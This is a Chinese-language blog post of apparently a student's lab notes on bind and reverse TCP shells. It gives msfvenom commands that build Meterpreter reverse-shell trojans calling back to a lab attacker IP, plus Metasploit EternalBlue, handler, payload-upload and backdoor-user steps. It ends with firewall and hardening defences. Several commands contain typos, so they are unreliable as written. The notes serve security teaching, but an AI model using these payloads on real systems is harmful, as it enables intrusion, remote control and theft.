<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>day2正向代理与反向代理 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="下载并安装win7理解正向代理员反向代理正向代理和反向代理：正向链接就是正常客户端向服务端发送请求，反向连接就是服务端主动连接客户端。代理就是管理的一系列软件。 eg：就好比学校的大门的入口，校内人员可以正常进入，校警不让外人进，此时就要里面的人来带外人进入，绕过校警，所以要使用反向代理就需要先在校内有人，所以在攻击前先要病毒在目标计算机里面，就能绕过计算机检擦，从而入侵计算机。 生成正向tcp">
<meta property="og:type" content="article">
<meta property="og:title" content="day2正向代理与反向代理">
<meta property="og:url" content="http://example.com/2025/10/28/day2%E6%AD%A3%E5%90%91%E4%BB%A3%E7%90%86%E4%B8%8E%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="下载并安装win7理解正向代理员反向代理正向代理和反向代理：正向链接就是正常客户端向服务端发送请求，反向连接就是服务端主动连接客户端。代理就是管理的一系列软件。 eg：就好比学校的大门的入口，校内人员可以正常进入，校警不让外人进，此时就要里面的人来带外人进入，绕过校警，所以要使用反向代理就需要先在校内有人，所以在攻击前先要病毒在目标计算机里面，就能绕过计算机检擦，从而入侵计算机。 生成正向tcp">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-10-28T05:57:51.000Z">
<meta property="article:modified_time" content="2025-10-28T09:11:15.028Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="101">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-day2正向代理与反向代理" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2025/10/28/day2%E6%AD%A3%E5%90%91%E4%BB%A3%E7%90%86%E4%B8%8E%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86/" class="article-date">
  <time class="dt-published" datetime="2025-10-28T05:57:51.000Z" itemprop="datePublished">2025-10-28</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      day2正向代理与反向代理
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="下载并安装win7"><a href="#下载并安装win7" class="headerlink" title="下载并安装win7"></a>下载并安装win7</h1><h1 id="理解正向代理员反向代理"><a href="#理解正向代理员反向代理" class="headerlink" title="理解正向代理员反向代理"></a>理解正向代理员反向代理</h1><p><strong>正向代理</strong>和<strong>反向代理</strong>：<strong>正向链接</strong>就是正常客户端向服务端发送请求，<strong>反向连接</strong>就是服务端主动连接客户端。代理就是管理的一系列软件。</p>
<p>eg：就好比学校的大门的入口，校内人员可以正常进入，校警不让外人进，此时就要里面的人来带外人进入，绕过校警，所以要使用反向代理就需要先在校内有人，所以在攻击前先要病毒在目标计算机里面，就能绕过计算机检擦，从而入侵计算机。</p>
<h1 id="生成正向tcp-Shell和反向tcp-Shell"><a href="#生成正向tcp-Shell和反向tcp-Shell" class="headerlink" title="生成正向tcp Shell和反向tcp Shell"></a>生成正向tcp Shell和反向tcp Shell</h1><p><strong>Metasploit</strong>：Metasploit Framework（MSF）是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持</p>
<p>续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以”可</p>
<p>以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了Ruby</p>
<p>语言编写的了。在kali中，自带了Metasploit工具。</p>
<h2 id="正向tcp-Shell"><a href="#正向tcp-Shell" class="headerlink" title="正向tcp Shell"></a>正向tcp Shell</h2><p><strong>制作木马用msfvenom指令：msfvenom -p windows&#x2F;meterpreter&#x2F;bind_tcp LHOST&#x3D;攻击机 LPORT&#x3D;攻击机端口 -f 输出格式（windows为exe   linux为elf   mac为macho） -o 文件名字</strong></p>
<h2 id="反向tcp-Shell"><a href="#反向tcp-Shell" class="headerlink" title="反向tcp Shell"></a>反向tcp Shell</h2><p><strong>制作木马用msfvenom指令：msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;攻击机 LPORT&#x3D;攻击机端口 -f 输出格式（windows为exe   linux为elf   mac为macho） -o 文件名字</strong></p>
<h2 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h2><p><strong>MSF</strong> <strong>使用方法：</strong></p>
<p>更新</p>
<p>msfupdate</p>
<p>进入框架</p>
<p>msfconsole</p>
<p>使用search命令查找相关漏洞</p>
<p>search ms17-010</p>
<p>使用use进入模块</p>
<p>use exploit&#x2F;windows&#x2F;smb&#x2F;ms17-010_eternalblue</p>
<p>使用info查看模块信息</p>
<p>info</p>
<p>设置攻击载荷</p>
<p>set payload windows&#x2F;x64&#x2F;meterpre&#x2F;reverse_tcp</p>
<p>msf6 则可以忽略此步</p>
<p>查看模块需要配置的参数</p>
<p>show options</p>
<p>设置参数</p>
<p>set 参数名 参数值</p>
<p>攻击</p>
<p>exploit&#x2F;run</p>
<p>后渗透阶段</p>
<p>不同的攻击用到的步骤也不一样，这不是一成不变的，需要灵活使用</p>
<p>也可以将攻击代码写入configure.rc（只要是以.rc结尾的文件）配置文件中，然后使用msfconsole -r</p>
<p>configure.rc进行自动攻击</p>
<p>转换编码编码</p>
<p>chcp 65001</p>
<p>添加用户</p>
<p>net user c 123 &#x2F;add</p>
<p>添加管理员权限</p>
<p>net user administrators c &#x2F;add &#x2F;&#x2F;将用户c添加到win7的本地管理员组中，获得管理员权限<strong>msfvenom****生成</strong> <strong>shellcode</strong></p>
<p><strong>普通生成</strong></p>
<p><strong>编码生成</strong></p>
<p>**msfvenom –list archs ** <strong>查看支持的系统架构</strong></p>
<p>**msfvenom –list platforms ** <strong>查看支持的系统平台</strong></p>
<p>**msfvenom -l payload ** <strong>列出所有可用的</strong>  <strong>paload</strong></p>
<p>**msfvenom -l formats   ** <strong>列出所有的输出格式</strong></p>
<p>**msfvenom -l encrypt  ** <strong>列出所有的加密方式</strong></p>
<p>**msfvenom -l encoders  ** <strong>列出所有的编码器</strong></p>
<p><strong>常见生成格式</strong></p>
<p><strong>windows</strong></p>
<p>查看用户</p>
<p>net user</p>
<p>使用kali远程登录</p>
<p>rdesktop 192.168.44.139</p>
<p>但是这样也会被win7的当前用户所以提示要不要让远程用户远程连接到本机</p>
<p>输入“gpedit.msc”并回车，打开本地组策略编辑器。</p>
<p>在组策略编辑器中依次展开“计算机配置”、“管理模板”、“Windows组件”、“远程桌面服务”和“远程桌面会话</p>
<p>主机”、“连接”、“限制连接的数量”。</p>
<p>右侧窗口中找到“限制每个用户只能有一个会话”选项，将其禁用。</p>
<p>保存设置并关闭组策略编辑器。</p>
<p>msfvenom -p 有效载荷 -f 输出格式 -o 输出文件</p>
<p>msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp -f exe -o payload.exe</p>
<p>msfvenom -a 系统架构 –platform 系统平台 -p 有效载荷 lhost&#x3D;攻击机IP lport&#x3D;攻击机端口 -e</p>
<p>编码方式 -i 编码次数 -f输出格式 -o 输出文件</p>
<p>msfvenom -a x86 –plaform windows -p windows&#x2F;meterpreter&#x2F;reverse_tcp</p>
<p>lhost&#x3D;192.168.44.130 lport&#x3D;4445 -i 3 -e x86&#x2F;shikata_ga_nai -f exe -o payload.exe</p>
<p>aarch64,armbe,armle,cbea，cbea64,cmd,dalvik,firefox,java，mips，mips64，</p>
<p>mips64le,mipsbe,mipsle,nodejs,php,ppc,ppc64,ppc64le,ppce500v2，</p>
<p>python,r,ruby,sparc,sparc64,tty,x64,x86,x86_64,zarch</p>
<p>aix,android,apple_ios,bsd,bsdi,cisco,firefox,freebsd,hardware,hpux,irix,java,ja<strong>linux</strong></p>
<p><strong>mac</strong></p>
<p>msfvenom –platforms windows -a x86 -p windows&#x2F;meterpreter&#x2F;reverse_tcp -f exe -o</p>
<p>payload.exe</p>
<p>msfvenom –paltforms windows -a x64 -p windows&#x2F;meterpreter&#x2F;reverse_tcp -f exe -o</p>
<p>payload.exe</p>
<p>msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.168.44.130 LPORT&#x3D;4445 -a</p>
<p>x86 -f exe -o payload.exe</p>
<p>进入 exploit&#x2F;multi&#x2F;handler</p>
<p>设置payload、lhost、lport</p>
<p>在 Meterpreter 会话中使用 upload 命令上传文件：</p>
<p>meterpreter &gt; upload &#x2F;home&#x2F;kali&#x2F;payload.exe C:\Users\c\Desktop\</p>
<p>msfvenom –platform linux -a x86 -p linux&#x2F;x86&#x2F;meterpreper&#x2F;reverse_tcp -f elf -o</p>
<p>payload.elf</p>
<p>msfvenom –platform osx -a x86 -p osx&#x2F;x86&#x2F;shell_revese_tcp -f macho -o</p>
<p>payload.macho</p>
<h2 id="投毒"><a href="#投毒" class="headerlink" title="投毒"></a>投毒</h2><h2 id="开启监听"><a href="#开启监听" class="headerlink" title="开启监听"></a>开启监听</h2><p>用：netstat -tulup | grep 端口号</p>
<p>就能看到端口号是否开启</p>
<p>先进入msfconsole</p>
<p>用：search handler</p>
<p>来查看哪个模块可以使用</p>
<p>用：use 模块名字</p>
<p>或者  use   行号</p>
<p>来使用模块；</p>
<p>接着来设置 :LHOST和LPORT等等</p>
<p>用：set LHOST 监听主机ip地址</p>
<p>set  LPORT  监听端口号</p>
<p>来开始监听</p>
<p>用：options</p>
<p>或者info</p>
<p>或者show options</p>
<p>来看设置设置好了没有；</p>
<p>接着用：run</p>
<p>来运行，监听</p>
<h2 id="接着等鱼咬钩"><a href="#接着等鱼咬钩" class="headerlink" title="接着等鱼咬钩"></a>接着等鱼咬钩</h2><h1 id="防御这个钓鱼木马"><a href="#防御这个钓鱼木马" class="headerlink" title="防御这个钓鱼木马"></a>防御这个钓鱼木马</h1><p>先进入防火墙，在高级设置里面设置入站规则和出站规则。把端口设置，就行了。</p>
<h1 id="问题-1：在真实的渗透测试中，什么场景下更适合使用反向-Shell？什么场景下更适合使用正向-Shell？"><a href="#问题-1：在真实的渗透测试中，什么场景下更适合使用反向-Shell？什么场景下更适合使用正向-Shell？" class="headerlink" title="问题 1：在真实的渗透测试中，什么场景下更适合使用反向 Shell？什么场景下更适合使用正向 Shell？"></a>问题 1：在真实的渗透测试中，什么场景下更适合使用反向 Shell？什么场景下更适合使用正向 Shell？</h1><ul>
<li><p>反向 Shell 适用场景</p>
<p>：</p>
<ul>
<li>当目标主机处于 ** 内网环境且有出口网络（能访问公网或攻击机所在网络）** 时，反向 Shell 更适用。例如目标主机在企业内网，攻击机在公网，目标主机可以主动向攻击机发起连接，突破内网的入站防火墙限制（因为内网防火墙通常允许出站流量）。</li>
<li>当目标主机的入站端口被严格限制，而出站端口相对开放时，反向 Shell 能绕过入站限制，让攻击机接收连接。</li>
</ul>
</li>
<li><p>正向 Shell 适用场景</p>
<p>：</p>
<ul>
<li>当目标主机是<strong>公网可访问的服务器</strong>，且攻击机处于内网环境（无法被目标主机主动连接）时，正向 Shell 更适用。此时目标主机在特定端口监听连接，攻击机主动发起连接即可获取 Shell。</li>
<li>当目标网络的出站流量被严格限制（如仅允许访问特定服务端口），反向 Shell 无法建立时，可尝试正向 Shell，利用目标主机的监听端口建立连接。</li>
</ul>
</li>
</ul>
<h1 id="问题-2：仅通过配置出站规则，能否有效防御所有反向连接？为什么？"><a href="#问题-2：仅通过配置出站规则，能否有效防御所有反向连接？为什么？" class="headerlink" title="问题 2：仅通过配置出站规则，能否有效防御所有反向连接？为什么？"></a>问题 2：仅通过配置出站规则，能否有效防御所有反向连接？为什么？</h1><p>不能。原因如下：</p>
<ul>
<li>反向连接的 Shell 可以利用目标主机<strong>正常的出站流量端口</strong>（如 80、443 等用于 HTTP、HTTPS 通信的端口）进行通信，这些端口通常在出站规则中是被允许的，攻击者可借此伪装流量，绕过出站规则的限制。</li>
<li>部分恶意软件会采用<strong>动态端口随机化</strong>或<strong>协议混淆</strong>技术，使反向连接的流量难以被出站规则精准识别和拦截。</li>
</ul>
<h1 id="问题-3：除了基于端口的防火墙规则，还有哪些更高级的加固手段可以防御此类攻击？"><a href="#问题-3：除了基于端口的防火墙规则，还有哪些更高级的加固手段可以防御此类攻击？" class="headerlink" title="问题 3：除了基于端口的防火墙规则，还有哪些更高级的加固手段可以防御此类攻击？"></a>问题 3：除了基于端口的防火墙规则，还有哪些更高级的加固手段可以防御此类攻击？</h1><ul>
<li><strong>应用程序白名单</strong>：只允许经过授权的应用程序运行，阻止恶意 payload（如用于建立 Shell 连接的程序）执行。</li>
<li><strong>入侵检测与防御系统（IDS&#x2F;IPS）</strong>：通过特征库识别反向 Shell 连接的流量特征（如特定的协议交互、Payload 特征码），实时检测并拦截攻击流量。</li>
<li><strong>行为分析技术</strong>：监控系统进程的异常行为，如进程异常创建网络连接、执行可疑命令等，及时阻断恶意行为。</li>
<li><strong>最小权限原则</strong>：限制用户和进程的权限，即使攻击者获取了 Shell，也难以执行高权限操作，降低攻击危害。</li>
<li><strong>漏洞补丁管理</strong>：及时修补系统和应用程序的漏洞，防止攻击者利用漏洞上传并执行用于建立 Shell 连接的 Payload。</li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2025/10/28/day2%E6%AD%A3%E5%90%91%E4%BB%A3%E7%90%86%E4%B8%8E%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86/" data-id="cmhacmips0000ocx6h2nec1c7" data-title="day2正向代理与反向代理" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/101/" rel="tag">101</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2025/10/27/makedown%E8%AF%AD%E6%B3%95/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">makedown语法</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/101/" rel="tag">101</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/markdown/" rel="tag">markdown</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B5%8B%E8%AF%95/" rel="tag">测试</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/101/" style="font-size: 20px;">101</a> <a href="/tags/markdown/" style="font-size: 10px;">markdown</a> <a href="/tags/%E6%B5%8B%E8%AF%95/" style="font-size: 10px;">测试</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/10/">October 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/10/28/day2%E6%AD%A3%E5%90%91%E4%BB%A3%E7%90%86%E4%B8%8E%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86/">day2正向代理与反向代理</a>
          </li>
        
          <li>
            <a href="/2025/10/27/makedown%E8%AF%AD%E6%B3%95/">makedown语法</a>
          </li>
        
          <li>
            <a href="/2025/10/27/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA%E6%95%99%E5%AD%A6/">博客搭建教学</a>
          </li>
        
          <li>
            <a href="/2025/10/27/text1/">text1</a>
          </li>
        
          <li>
            <a href="/2025/10/27/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>